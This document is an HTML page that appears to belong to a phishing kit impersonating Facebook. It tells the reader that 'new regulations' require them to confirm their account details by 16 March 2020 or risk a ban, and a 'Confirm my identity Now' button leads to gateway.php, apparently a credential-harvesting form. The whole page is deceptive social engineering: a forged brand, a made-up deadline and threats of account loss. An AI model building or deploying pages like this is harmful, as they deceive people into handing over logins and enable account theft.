<html>
<head>
<title> You are required to update your details!</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
</head>
<center><div class="container"><br><Br>

<img src="newlogo.png">
<h4>Stay secure on Facebook</h4><hr>
<div class="panel panel-info">
<div class="panel-heading">

Account Confirmation</div>
<div class="panel-body">
Dear user,<br><br>
We require you to confirm your Facebook details today to avoid service limitations! Due to new regulations on Social Media Platforms you
need to complete this step by 16th of March 2020. This is to ensure account integrity and the security of our users! Failing to complete this step may get your account banned! <br><Br><strong>We're sorry for the inconvenience!</strong><br><hr>
<a href="gateway.php" class="btn btn-primary">Confirm my identity Now</a>
</div>
</center>
